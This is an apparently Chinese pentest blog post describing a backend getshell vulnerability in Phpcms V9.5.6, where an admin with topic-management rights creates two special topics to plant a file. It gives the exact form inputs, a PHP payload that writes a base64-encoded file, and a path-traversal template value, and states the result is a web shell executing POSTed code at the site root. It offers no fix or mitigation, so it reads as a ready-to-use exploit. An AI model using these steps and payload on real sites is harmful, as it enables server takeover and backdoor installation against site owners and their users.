Phpcms最新版V9.5.6后台专题getshell漏洞

  • A+
所属分类:技术园 渗透

简要描述:

低权限后台拿shell
版本:Phpcms V9.5.6 Release 20140522

详细说明:

前提是需要有管理专题的权限

测试版本

PHPCMS程序版本:Phpcms V9.5.6 Release 20140522

过程

添加专题专题名称:test

  1. 专题横幅:/1.jpg
  2. 专题缩略图:/1.jpg
  3. 专题导读:
  4. 生成静态:是
  5. <?php file_put_contents(‘0.php’,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==’)); ?>
  6. 专题生成目录:test000
  7. 专题子分类:test test
  8. 其他默认 -> 提交

2. 再次添加专题

  1. 专题名称:test1
  2. 专题横幅:/1.jpg
  3. 专题缩略图:/1.jpg
  4. 专题导读:
  5. 生成静态:是
  6. 专题生成目录:test111
  7. 专题子分类:test test
  8. 扩展设置
  9. 专题模板:value设置为../../../../html/special/test000/index

其他默认 -> 提交

会在根目录下面生成 0.php 内容为 <?php @eval($_POST[5]);?>

漏洞证明:

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: